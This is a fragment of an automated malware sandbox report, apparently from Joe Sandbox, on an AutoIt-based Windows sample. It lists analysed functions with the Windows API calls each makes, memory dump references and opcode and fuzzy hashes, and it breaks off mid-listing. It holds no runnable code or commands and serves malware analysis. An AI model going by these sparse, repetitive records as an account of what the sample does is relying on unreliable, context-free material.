                                                                                                                                                  • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                                                                                                                  Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2782032738-0
                                                                                                                                                  • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                  • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                                                                                                                  • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                                                  • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                                                                                                                  Function 00A7B180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointerEx.KERNEL32 ref: 00A7B2BA
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00A7B2E0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 539440098-0
                                                                                                                                                  • Opcode ID: 914e9deca51aa87190b688071deee23e0e06df5423ab2a3f5a6c2056b23a48d9
                                                                                                                                                  • Instruction ID: a01bac3717b4caceea9ced8e22e9d5ceadec641c722978d640579404d48ed454
                                                                                                                                                  • Opcode Fuzzy Hash: 914e9deca51aa87190b688071deee23e0e06df5423ab2a3f5a6c2056b23a48d9
                                                                                                                                                  • Instruction Fuzzy Hash: 173184F052D384AED7118B698C1976FBFE06F92714F48C64DE4DC8A692D3B4884887B3
                                                                                                                                                  Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID: AU3!P/I$EA06
                                                                                                                                                  • API String ID: 4104443479-1914660620
                                                                                                                                                  • Opcode ID: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
                                                                                                                                                  • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                                                                                                  • Opcode Fuzzy Hash: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
                                                                                                                                                  • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                                                                                                  Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0043EA39
                                                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                                                                                    • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                    • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                  • String ID: X
                                                                                                                                                  • API String ID: 3777226403-3081909835
                                                                                                                                                  • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                  • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                                                                                                  • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                                                                                  • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                                                                                                  Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                                  • String ID: EA06
                                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                                  • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                  • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                                                                                                                  • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                                                                                                                  • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                                                                                                                  Function 00BF7000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00BF7045
                                                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 00BF7064
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CreateExit
                                                                                                                                                  • String ID: D
                                                                                                                                                  • API String ID: 126409537-2746444292
                                                                                                                                                  • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                                                  • Instruction ID: 358a8450469b04af050bc7c8570ea222f40293300f954189be7e3c66a4a38df3
                                                                                                                                                  • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                                                  • Instruction Fuzzy Hash: 64F0C97154424CABDB60DFE0CC49FFE77B8AF08701F148548BB0A9B180DE7896088B61
                                                                                                                                                  Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                                                  • String ID: aut
                                                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                                                  • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                  • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                                                                                  • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                                                                                  • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                                                                                  Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                  • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                                                                                                  • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                                                                                  • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                                                                                                  Function 00A97DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ComputerName
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3545744682-0
                                                                                                                                                  • Opcode ID: 723eec8b487743482e9827446a2c7cbe8d875dc3e3ae071c13211d5d2b26e432
                                                                                                                                                  • Instruction ID: a8086a25094294fda138e7589ad9da18f7d8572831b80601d1315e771135367e
                                                                                                                                                  • Opcode Fuzzy Hash: 723eec8b487743482e9827446a2c7cbe8d875dc3e3ae071c13211d5d2b26e432
                                                                                                                                                  • Instruction Fuzzy Hash: B321F53576D3407FEE3567148C06FBD3AF46FA2710F884889F488591D2E5686C088A73
                                                                                                                                                  Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00404370
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconNotifyShell_$_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1505330794-0
                                                                                                                                                  • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                  • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                                                                                                  • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                                                                                  • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                                                                                                  Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                                                                                    • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                                                                                    • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                                                                                    • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                                                                                    • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                                                                                    • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                                                                                    • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                                                                                    • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00B60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1372826849-0
                                                                                                                                                  • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                  • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                                                                                                                  • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                                                                                  • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                                                                                                                  Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                                                                                                  • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                                  • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                  • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                                                                                                                  • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                                                                                  • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                                                                                                                  Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 00468D1B
                                                                                                                                                    • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                                                                                    • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                                                                                  • _free.LIBCMT ref: 00468D2C
                                                                                                                                                  • _free.LIBCMT ref: 00468D3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                                  • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                                                                                                                  • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                                                  • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                                                                                                                  Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CALL
                                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                                  • Opcode ID: a1baa42b8be179491f8629f726f649e9c6f633d5cce95d2c5905adb20c947136
                                                                                                                                                  • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                                                                                                                  • Opcode Fuzzy Hash: a1baa42b8be179491f8629f726f649e9c6f633d5cce95d2c5905adb20c947136
                                                                                                                                                  • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                                                                                                                  Function 00465B7A Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00465B93
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
